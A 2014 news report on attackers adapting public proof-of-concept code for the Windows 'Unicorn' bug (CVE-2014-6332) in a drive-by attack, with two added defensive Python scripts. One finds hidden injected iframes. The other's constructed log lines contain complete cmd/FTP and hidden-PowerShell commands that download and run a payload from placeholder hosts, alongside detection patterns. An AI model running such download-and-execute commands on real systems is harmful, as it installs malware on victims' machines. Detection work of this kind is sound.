Proof-of-concept code makes things easy for cybercriminals

Nov 21, 2014 09:19 GMT
[Image: Web page containing the malicious iframe redirecting to the exploit]

An exploit for the recently disclosed vulnerability, which has been present in Windows since Windows 95, has been found on the popular website of a news agency in Bulgaria.

The flaw, tracked as CVE-2014-6332, was nicknamed the "Unicorn" bug because of its rarity. The attack appears to be in a testing phase at the moment, since only one page on the site has been compromised.

Demo code helps the threat actor

According to security researchers from ESET, this is the first report of the vulnerability being exploited in the wild. The attackers did not write the exploit themselves; they took the proof-of-concept (PoC) code published at the beginning of the week by a Chinese researcher and adapted it to their needs.

Researchers at IBM's X-Force found the 19-year-old bug in the Windows code and say it has been remotely exploitable for the past 18 years, since VBScript support was introduced in Internet Explorer 3.0.

They said that the weakness survived every redesign and security measure added to Internet Explorer since then: the exploit is not affected by Enhanced Protected Mode (EPM) in IE 11, nor by the exploit mitigations applied by Microsoft's Enhanced Mitigation Experience Toolkit (EMET).

Exploiting the flaw is not trivial. One hurdle is getting arbitrary data into the memory that holds VBScript arrays (SafeArrays) on the IE heap; another is the Variant type-compatibility checks that apply when an access lands outside the bounds of a VBScript array.

However, the availability of demo code made the attackers' work much easier: they only had to modify parts of it to fit their purpose.

Exploit and payload hosted on Russian website

ESET researchers say that infection happens through a drive-by download: a malicious iframe injected into the HTML page points to an exploit kit (EK). They could not identify the EK, but the threat is detected by the company's products as Win32/Exploit.CVE-2014-6332.A regardless.
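As an added example, not part of ESET's report or the original article, the following Python script scans a page for iframes that look injected: an off-site src combined with a 1x1 size or CSS hiding. The sample HTML, the site name news.example.bg and the exploit-kit host ek.example.net are constructed for the demo and are not taken from the compromised Bulgarian page.

```python
"""Flag iframes that look injected into a page: off-site src plus a
zero/one-pixel size or display:none / visibility:hidden styling.
Added example; the sample page below is constructed, not the real site."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: one legitimate on-site widget frame and one hidden,
# off-site frame of the kind described in the article.  Hosts are made up.
SAMPLE_HTML = """
<html><body>
<h1>Latest news</h1>
<iframe src="https://news.example.bg/widgets/weather.html" width="300" height="200"></iframe>
<p>Story text ...</p>
<iframe src="http://ek.example.net/redir.php?id=7" width="1" height="1" style="visibility:hidden"></iframe>
</body></html>
"""

_HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


class _IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            # Valueless attributes come through as None; normalise to "".
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _tiny(value):
    """True for a width/height of 2px or less (e.g. "1", "0px")."""
    try:
        return int(value.strip().rstrip("px")) <= 2
    except ValueError:
        return False


def find_suspicious_iframes(html, site_host):
    """Return [{"src": ..., "reasons": [...]}] for iframes worth a look.

    site_host is the hostname the page legitimately lives on; any iframe
    whose src points elsewhere, or that is sized/styled to be invisible,
    is reported together with the reasons that triggered.
    """
    parser = _IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        host = urlparse(src).hostname or ""  # "" for relative URLs
        reasons = []
        if host and host != site_host.lower():
            reasons.append("off-site src: " + host)
        if _tiny(attrs.get("width", "")) and _tiny(attrs.get("height", "")):
            reasons.append("1x1/zero-size frame")
        if _HIDDEN_STYLE.search(attrs.get("style", "")):
            reasons.append("hidden via CSS")
        if reasons:
            findings.append({"src": src, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for hit in find_suspicious_iframes(SAMPLE_HTML, "news.example.bg"):
        print(hit["src"], "->", "; ".join(hit["reasons"]))
```

Run it against a saved copy of a page and the legitimate hostname; a frame that trips all three checks is the classic drive-by injection pattern, while an off-site but full-size frame may simply be an embedded widget and needs a human look.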

The attackers appear to have built two payloads that fetch malware from two different locations. One runs commands in the Command Prompt and downloads an executable (natmasla.exe) from an FTP server; the other achieves the same result with PowerShell, fetching the binary from a site hosted in Russia (natmasla[.]ru).
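As an added example, not ESET's detection logic or the article's own code, the Python below runs over constructed process-creation log lines (timestamp|parent image|image|command line) and flags command interpreters spawned by Internet Explorer whose command line fetches a file in the two ways the article describes: cmd.exe driving ftp with a script file, and PowerShell using Net.WebClient. The log format, the hosts ftp.example.net and dl.example.ru, and the file name payload.exe are assumptions made for the demo; the real command lines are not shown on the page.

```python
"""Flag browser-spawned command interpreters whose command line pulls a
file down over FTP or HTTP, the two payload styles the article describes.
Added example over constructed log lines; not ESET's detection rule."""
import re

# Constructed process-creation log: timestamp|parent image|image|command line.
# Hosts, paths and file names are made up for the demo.
SAMPLE_LOG = r"""
2014-11-20T10:01:02Z|iexplore.exe|iexplore.exe|"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:1234
2014-11-20T10:01:05Z|iexplore.exe|cmd.exe|cmd.exe /c echo open ftp.example.net>s.txt&echo get payload.exe>>s.txt&ftp -s:s.txt&payload.exe
2014-11-20T10:01:06Z|iexplore.exe|powershell.exe|powershell.exe -w hidden -nop -c "(New-Object Net.WebClient).DownloadFile('http://dl.example.ru/payload.exe','%TEMP%\p.exe'); Start-Process '%TEMP%\p.exe'"
2014-11-20T10:02:00Z|explorer.exe|powershell.exe|powershell.exe -File C:\scripts\inventory.ps1
2014-11-20T10:02:30Z|explorer.exe|cmd.exe|cmd.exe /c dir C:\Users
""".strip().splitlines()

BROWSERS = {"iexplore.exe"}
INTERPRETERS = {"cmd.exe", "powershell.exe"}

# (label, regex) pairs; every label whose regex matches is recorded.
INDICATORS = [
    ("ftp -s: script download", re.compile(r"\bftp(\.exe)?\s+-s:", re.I)),
    ("PowerShell web download", re.compile(
        r"Net\.WebClient|DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b", re.I)),
    ("hidden PowerShell window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("encoded PowerShell command", re.compile(
        r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
]


def parse_line(line):
    """Split one log line into its four fields (command line may contain '|'-free text)."""
    ts, parent, image, cmdline = line.split("|", 3)
    return {"ts": ts, "parent": parent.lower(), "image": image.lower(), "cmdline": cmdline}


def flag_downloads(lines):
    """Return records for interpreters spawned by a browser whose command
    line carries at least one download indicator."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec["parent"] not in BROWSERS or rec["image"] not in INTERPRETERS:
            continue  # admin PowerShell from explorer.exe etc. is out of scope
        matched = [label for label, rx in INDICATORS if rx.search(rec["cmdline"])]
        if matched:
            rec["indicators"] = matched
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for h in flag_downloads(SAMPLE_LOG):
        print(h["ts"], h["parent"], "->", h["image"], ":", ", ".join(h["indicators"]))
```

The parent-process condition is what keeps the rule quiet: the same ftp or WebClient command typed by an administrator from Explorer is not flagged, while a browser handing a download command to cmd.exe or PowerShell is exactly the hand-off a drive-by exploit has to make.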

The experts analyzed the executable and found a versatile piece of malware (Win32/IRCBot.NHR) that can be used for activities ranging from DDoS attacks to opening remote shells on the compromised system.

Researchers also found a quotation from Einstein in the malware code: “Anyone who has never made a mistake has never tried anything new.”

Given that the PoC is publicly available, it is reasonable to expect more attacks leveraging this vulnerability.

Microsoft has patched the vulnerability (bulletin MS14-064) and pushed the fix through Windows Update, but whether it gets applied depends entirely on the end user.

[Image gallery: Exploiting the Unicorn bug. Captions: web page containing the malicious iframe redirecting to the exploit; the exploit is hosted on a Russian website; strings crediting the PoC author.]